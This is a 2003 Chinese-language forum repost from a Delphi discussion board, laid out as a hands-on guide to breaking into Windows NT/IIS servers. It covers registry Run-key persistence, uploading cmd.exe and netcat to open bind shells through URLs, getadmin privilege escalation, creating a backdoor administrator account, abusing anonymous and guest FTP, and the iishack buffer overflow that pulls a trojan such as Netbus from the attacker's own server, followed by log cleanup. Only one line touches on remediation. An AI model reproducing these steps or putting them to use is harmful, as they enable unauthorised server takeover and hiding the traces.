線上訂房服務-台灣趴趴狗聯合訂房中心
發文 回覆 瀏覽次數:1384
推到 Plurk!
推到 Facebook!

轉貼一篇 駭客竊取手法

 
jackkcg
站務副站長


發表:891
回覆:1050
積分:848
註冊:2002-03-23

發送簡訊給我
#1 引用回覆 回覆 發表時間:2003-06-20 12:30:20 IP:61.221.xxx.xxx 未訂閱
轉貼一篇 原網址我已忘記了 希望知道的網友可以po上 獲取NT的admin許可權的方法: 一、通過修改註冊表 凡是具有登錄NT本機的用戶,例如IUSR_machine,都具有對 HKEY_LOCAL_MACHINE\SOFTWARE \MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫許可權,該用戶可以遠端存取這個項 。比如,他可以創建一個bat文件,文件內容爲: cmd.exe /c net localgroup administrat ors IUSR_machine /add,把該文件copy到winnt目錄下,然後在註冊表上述的項添加一個數值, 指向這個文件。 那麽,當下次Admin登錄到該機器上時,就會自動把IUSR_machine添加到Administrators組。 另,註冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore r\User Shell Folders\Common Startup 也可以這麽做。 二、自建telnet服務在NT上執行指令 要求用戶有文件上傳許可權,而且該目錄位於web目錄下,該目錄允許執行 下面是具體步驟 假設你的目錄是www.xxx.com/frankie 那麽,把cmd.exe(位於C:\winnt\system32\cmd.exe)和Netcat裏面包含的nc.exe傳到這個目錄 上去, 然後,在瀏覽器端輸入: http://www.xxx.com/frankie/cmd.exe?/c nc.exe -l -p 23 -t -e cmd.ex e 這時候,你的瀏覽器將停止不動,實際上,server上的Telnet的服務已經産生了: 這時,用Telnet連接www.xxx.com的23埠,你發現,不用密碼,不用登陸,對方C:\提示符已經出 現在你的眼前!更妙的是,這個Telnet server是一個一次性的服務,當用戶端一退出,該服務也 將終止. Netcat不同於一般的特洛伊木馬,它可以構建任何的TCP連接服務.在瀏覽器端輸入上述的字元 串,等價於在NT的Dos方式下輸入: nc -l -p 23 -t -e cmd.exe 這將把cmd.exe綁定到23埠上 三、入侵NTserver典型途徑V2.0 簡介 1、如果你有NT/IIS伺服器的任何一個帳號,哪怕是guest帳號,都可以獲得root 2、用netcat和iishack可以獲得root 3、iusr_電腦名這個帳號有ftp上傳,web執行等許可權. 4、在web server上執行程式是入侵NT的關鍵 5、要在web server上執行程式就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行許可權 的目錄上去 在本文中,目的機器的名稱是ntsvr2,目的機器的功能變數名稱是www.xxx.com,目的機器上有scripts和 cgi-bin目錄,scripts目錄下有uploadn.asp等asp 程式,可能有guest帳號,肯定有iusr_ntsvr2這個帳號: 第一個方法,用iusr_ntsvr2後者guest這兩個帳號,這裏假設我們已經破解了這個帳號的密碼 : 在瀏覽器輸入: http://www.xxx.com/scripts/uploadn.asp guest和iusr_ntsvr2這兩個帳號都可以進這個asp頁面 在這裏把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄. 然後輸入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2 大約十多秒後螢幕顯示: CGI Error 這時有90%的可能是:你已經把IUSR_ntsvr2升級爲Administrator,也就是任何訪問該web站的 人都是管理員 下面可以add user: http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add 這樣就創建了一個叫china用戶,密碼是news,然後: http://www.xxx.com/scripts/getadmin.exe?china 第二個方法,用匿名ftp: 如果允許匿名帳號ftp登陸的設定,也給我們帶來了突破NT server的機會。我們用ftp登陸一 個NT server,比如:www.xxx.com(示例名): ftp www.xxx.com Connected to www.xxx.com 220 ntsvr2 Microsoft FTP Service (Version 3.0). ntsvr2這個東西暴露了其NETbios名,那麽在IIS的背景下,必然會有一個IUSR_ntsvr2的用戶帳 號,屬於Domain user組,這個帳號我們以後要用來 獲取Administrator的許可權 User (www.xxx.com:(none)):anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 輸入 guest@ 或者guest 對於缺乏網路安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設置密碼。那麽 guest帳號就是一個可用的正確的用戶帳號,雖然 只屬於Domain guest組 在這種情況下我們就可以進NT server的ftp了。 進去以後,看看目錄列表,試試 cd /scripts 或cgi-bin等關鍵目錄,如果運氣好,改變目錄成 功,這時你就有了80%的把握。 把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin 然後輸入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2 大約十多秒後螢幕顯示: CGI Error 這時有90%的可能是:你已經把IUSR_ntsvr2升級爲Administrator,也就是任何訪問該web站的 人都是管理員 下面可以add user: http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add 這樣就創建了一個叫china用戶,密碼是news,然後: http://www.xxx.com/cgi-bin/getadmin.exe?china 或者 http://www.xxx.com/scripts/tools/getadmin.exe?china 你再用china的帳號登陸,就可以有最大的許可權了,也可以用上面的cmd.exe的方法直接修改 如 果沒有cmd.exe,也可以自己傳一個上去到 scripts/tools或者cgi-bin目錄 第三個方法,用netcat和iishack 如果你熟悉使用Netcat這個工具,你就知道,netcat可以利用NT的弱點在其上綁定埠,下面用 eEye的工具已經介紹過,如果你熟悉Netcat,成功的可能性會更大: IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關於NT/IIS的問題和工 具.在IIS的/Inetsrv目錄下,有個DLL文件叫 ism.dll,這個模組在web運行的時候就被載入到較高的記憶體地址,並且導致了零位元組問題到處 出現 IIShack.asm ,利用這個毛病,eEye寫了兩個程式: iishack.exe ncx99.exe,爲達目的你必須自己有一個web server,把ncx99.exe和 netbus木馬傳到這個web server的目錄下,比如你的web server是: www.mysvr.com? 而對方的IIS server是www.xxx.com 則: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字元!) 上述命令輸入後這時你應該可以看到 ------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- barns@eeye.com. http://www.eEye.com [usage: iishack ] eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe do not include 'http://' before hosts! --------------------------------------------------------------- Data sent! 然後,再把Netbus等特洛伊木馬傳到對方機器上去: iishack www.example.com 80 www.myserver.com/netbus.exe ncx99.exe實際上是有名的Netcat的變種,它把對方server的cmd.exe綁定到Telnet服務 ncx.exe 這是較早的版本,是把埠綁到80的,由於80埠跑web服 務,埠已經被使用.所以可能不一定有效 然後,用Telnet到對方的99或80埠: Telnet www.xxx.com 99 結果是這樣: Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\>[You have full access to the system, happy browsing :)] C:\>[Add a scheduled task to restart inetinfo in X minutes] C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\>[Clean up any trace or logs we might have left behind.] 這樣,你就完全控制了其硬碟上的文件!注意,如果你type exit退出,對方server上的這個進程 也會退出 參考資料: eeye.zip 補救方法:在IIS的www service屬性中將主目錄的應用程式設置的*.htr的映射刪除 微軟對這個問題的正式回應 其他:用Retina.exe得到NT域內的帳號清單,逐個嘗試這些帳號,如果有的密碼薄弱而被你猜出 來,就可以用上面的方法來獲取NT的admin ********************************************************* 哈哈&兵燹 最會的2大絕招 這個不會與那個也不會 哈哈哈 粉好 Delphi K.Top的K.Top分兩個字解釋Top代表尖端的意思,希望本討論區能提供Delphi的尖端新知 K.表Knowlege 知識,就是本站的標語:Open our mind to make knowledge together! 希望能大家敞開心胸,將知識寶庫結合一起
------
**********************************************************
哈哈&兵燹
最會的2大絕招 這個不會與那個也不會 哈哈哈 粉好

Delphi K.Top的K.Top分兩個字解釋Top代表尖端的意思,希望本討論區能提供Delphi的尖端新知
K.表Knowlege 知識,就是本站的標語:Open our mind
系統時間:2024-05-21 1:04:55
聯絡我們 | Delphi K.Top討論版
本站聲明
1. 本論壇為無營利行為之開放平台,所有文章都是由網友自行張貼,如牽涉到法律糾紛一切與本站無關。
2. 假如網友發表之內容涉及侵權,而損及您的利益,請立即通知版主刪除。
3. 請勿批評中華民國元首及政府或批評各政黨,是藍是綠本站無權干涉,但這裡不是政治性論壇!